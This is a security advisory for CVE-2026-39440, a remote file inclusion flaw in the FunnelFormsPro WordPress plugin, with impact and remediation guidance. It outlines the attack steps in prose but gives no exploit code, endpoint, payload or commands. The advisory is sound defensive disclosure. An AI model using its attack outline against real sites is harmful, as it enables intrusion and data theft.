Overview
CVE-2026-39440 is a critical code injection vulnerability in FunnelFormsPro, a WordPress plugin developed by Funnelforms LLC. The vulnerability allows remote code inclusion (RCI), enabling attackers to force the vulnerable WordPress installation to fetch and execute a PHP file from an attacker-controlled remote server. With a CVSS score of 9.9, this is one of the most severe plugin vulnerabilities seen in the WordPress ecosystem.
| Field | Details |
|---|---|
| CVE ID | CVE-2026-39440 |
| CVSS Score | 9.9 (Critical) |
| Vendor | Funnelforms LLC |
| Product | FunnelFormsPro |
| Affected Versions | n/a through 3.8.1 |
| Fixed Version | Update to latest version immediately |
| Attack Vector | Network |
| CWE | CWE-94 — Improper Control of Generation of Code |
| Published | 2026-04-23 |
Technical Details
Remote file inclusion (RFI) vulnerabilities occur when a PHP application dynamically includes files based on user-supplied input without adequate validation or restriction. In FunnelFormsPro through 3.8.1, an attacker can supply a URL pointing to a malicious PHP script hosted on an external server. The WordPress server then fetches and executes that remote file as if it were trusted local code.
This attack requires PHP's allow_url_include directive to be enabled (which is off by default in modern PHP installations, but may be enabled in shared hosting or legacy environments). Even without allow_url_include, variations of this vulnerability class may still achieve local file inclusion, data disclosure, or path traversal impacts.
Attack Flow
- Attacker identifies a WordPress site running FunnelFormsPro ≤ 3.8.1
- Attacker hosts a malicious PHP payload on an external server they control
- Attacker sends a crafted request to the vulnerable FunnelFormsPro endpoint, supplying the remote URL as a parameter
- The plugin fetches and includes the remote file server-side
- The malicious PHP executes in the context of the WordPress server, enabling full RCE, credential theft, or web shell installation
Why 9.9 and Not 10.0
The CVSS 9.9 score (rather than the maximum 10.0) typically indicates that at least one attack vector factor has a slight constraint — in this case, likely the PHP configuration requirement for allow_url_include in the strictest RFI exploitation path, or a minor privilege requirement. In practice, the impact is functionally equivalent to full unauthenticated RCE.
Impact
A successful exploit of CVE-2026-39440 allows an attacker to:
- Execute arbitrary PHP code on the web server
- Install web shells for persistent backdoor access
- Steal WordPress credentials, database credentials (from
wp-config.php), and all site data - Pivot to other services or databases accessible from the server
- Deface or destroy the WordPress site
- Leverage the server as a botnet node, spam relay, or cryptominer
Affected Deployments
FunnelFormsPro is a commercial WordPress plugin used to create conversion-focused forms and funnels within WordPress. Organizations using this plugin for lead capture, opt-in forms, or marketing funnels on versions 3.8.1 and below should treat this as an urgent remediation priority.
Remediation
- Update immediately to the latest version of FunnelFormsPro from Funnelforms LLC — check the plugin repository or vendor's dashboard for a patched release
- If no patch is yet available, deactivate and remove the plugin until a fix is issued
- Audit web server logs for suspicious outbound HTTP requests that may indicate prior exploitation
- Review WordPress file system for unexpected PHP files in the uploads directory or plugin folders that may indicate web shell installation
- Rotate all credentials stored in
wp-config.php, including database passwords - Ensure
allow_url_includeis set toOffin your PHP configuration as a defense-in-depth measure
Workaround
Disable the FunnelFormsPro plugin entirely until a patched version is confirmed available. This eliminates the attack surface while a permanent fix is applied.